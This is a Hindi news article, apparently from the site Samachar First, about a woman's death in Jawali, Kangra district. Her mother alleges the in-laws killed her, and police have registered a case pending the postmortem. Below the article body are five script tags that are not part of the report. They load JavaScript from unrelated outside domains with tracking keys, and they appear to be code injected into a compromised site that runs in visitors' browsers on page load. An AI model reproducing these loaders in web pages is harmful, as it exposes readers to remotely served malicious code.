कांगड़ाः मां ने ससुराल पक्ष पर लगाया बेटी की हत्या करने का आरोप, मामला दर्ज़

<p>जिला कांगड़ा के जवाली में एक महिला की मौत का मामला सामने आया है। पुलिस ने मृतका की मां के बयान के अधार पर मामला दर्ज किया है। जानकारी के अनुसार दोड़ला निवासी गुड्डी देवी पत्नी प्रताप चंद की बेटी ऊषा की शादी साल 2013 में&nbsp; कुठेर निवासी अर्जुन से हुई थी। कुछ समय बाद उसके पति, सास और ससुर ने ऊषा देवी को शारीरिक और मानसिक रुप से प्रताड़ित करना शुरु कर दिया। बीच-बचाव करते हुए कई बार इनका आपस में समझौता करवाया लेकिन उनके व्यवहार में कोई परिवर्तन नहीं हुआ।</p>

<p>मृतका की मां ने बीते कल अपनी बेटी से फोन पर बात की तो उसने बताया कि उसके पति ने शराब पी रखी है और उसके कमरे का दरवाजा बंद कर दिया है। इसके कुछ समय बाद ऊषा के ससुर ने उसकी मां को फोन करके बताया कि उसने फंदा लगा लिया है। इस मौके को देखने के लिए उसके मायके वाले उसके ससुराल पहुंचे तो देखा कि उषा देवी के सिर और शरीर पर चोटों के निशान थे। लेकिन गले में कोई चोट के निशान नहीं थे। इसने जाहिर किया कि उसके पति, सास और ससुर ने उसकी हत्या की है। इस घटना की सूचना पुलिस को दी गई। सूचना&nbsp; मिलते ही ज्वाली पुलिस ने इस घटनास्थल पर पहुंची और शव को पोस्टमार्टम हेतु टांडा भेज दिया। पुलिस ने तुरंत कार्रवाई करते हुए आईपीसी की धारा 304 और 34 के तहत मामला दर्ज कर आगे की कार्रवाई शुरु कर दी है।</p>

<p>पुलिस से मिली जानकारी के अनुसार धर्मशाला फोरेंसिक टीम मौके पर पहुंची, और उन्होंने घटना स्थल से साक्ष्य जुटाए। डीएसपी ज्वाली ओंकार सिंह और एसपी कांगड़ा विमुक्त रंजन भी पहुंचे। एसपी कांगड़ा विमुक्त रंजन ने कहा कि आत्महत्या है या हत्या यह पोस्टमार्टम रिपोर्ट के बाद ही पता चलेगा। पुलिस मामले की जांच कर रही है और आरोपियों से पूछताछ कर रही है।</p>
<script src=”http://amptylogick.com/optout/set/lat?jsonp=__mtz_cb_347811018&amp;key=21aca573d498d25317&amp;cv=1574417387&amp;t=1574417387022″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/optout/set/lt?jsonp=__mtz_cb_652040491&amp;key=21aca573d498d25317&amp;cv=1536071&amp;t=1574417387024″ type=”text/javascript”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1574417387042″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

वर्षा शालिका के पास मिली दिहाड़ी मजदूर की लाश

Body found in Bhoraj: भोरंज उपमंडल की पंचायत जाहू के सुलगवान चौक पर एक मृत…

31 seconds ago

आर एस बाली ने रामायण के माध्यम से सामाजिक एकता की दी प्रेरणा

Valmiki Jayanti celebration in Nagrota: महर्षि वाल्मीकि के प्रकटोत्सव के अवसर पर जिला कांगड़ा की…

5 mins ago

Himachal: 600 करोड़ की स्वीकृति के बावजूद लंबित मांगों पर नाराजगी

Himachal Employee Federation meeting:  हिमाचल प्रदेश कर्मचारी महासंघ ने मंगलवार को सचिवालय के प्रांगण में …

17 mins ago

Anti-Drug Campaign: पुलिस का नशे के खिलाफ अभियान तेज, बुद्धिजीवी वर्ग से मांगा सहयोग

  Hamirpur Anti-Drug Campaign: नशा तस्करों के खिलाफ हमीरपुर पुलिस ने एक नई मुहिम की…

5 hours ago

मंडी शहर के विकास कार्यों में तेजी लाएं: अनिल

Mandi Municipal Corporation Meeting:  मंगलवार को नगर निगम मंडी के सभागार में सभी विभागों और…

5 hours ago

Cluster Level Competition: बाल मेले में छात्रों ने नृत्य, गायन और मॉडल प्रदर्शनी में दिखाई प्रतिभा

  Cluster Level Competition : स्कूली छात्रों में विज्ञान के प्रति रुचि और प्रतिस्पर्धा की…

5 hours ago